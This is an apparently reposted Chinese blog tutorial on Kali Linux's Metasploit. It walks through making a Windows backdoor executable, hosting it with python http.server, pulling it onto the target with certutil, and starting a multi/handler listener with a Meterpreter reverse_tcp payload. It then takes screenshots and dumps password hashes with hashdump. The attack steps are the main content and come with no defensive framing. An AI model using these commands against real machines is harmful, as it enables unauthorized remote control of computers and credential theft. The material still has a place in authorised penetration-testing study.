本文主要是介绍Kali之metasploit学习,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
目标:尝试使用metasploit制作一个windows 后门(exe文件)
一:使用metasploit生成一个exe安装包。
二、将对应的可执行文件放入到目标机
python3 -m http.server 端口号: 模块化启动一个端口。
windows 证书管理工具:certutil ,可以使用它来下载文件。
例如:certutil -urlcache -split -f http://目标ip地址:端口号
三、开启metasploit监听msfconsole
msf 的使用法则:
1.使用模块 use
2. 配置模块必选项:set
3.运行模块:run
具体实践步骤如下:
1. 输入msfconsole进入msf6命令行
2.使用模块 并设置相关参数
# 使用 攻击/多重/句柄
use exploit/multi/handler # 和之前生成exe文件的保持一致
# 设置payload
set payload windows/x64/meterpreter/reverse_tcp# 设置ip
set lhost 192.168.*.*# 设置端口
set lport 9000
3.运行run
四、尝试获取目标机(windows)信息
截图命令:screenshot
密码:hashdump (当密码超过8位,且有多种元素,就无法破解了)
这篇关于Kali之metasploit学习的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!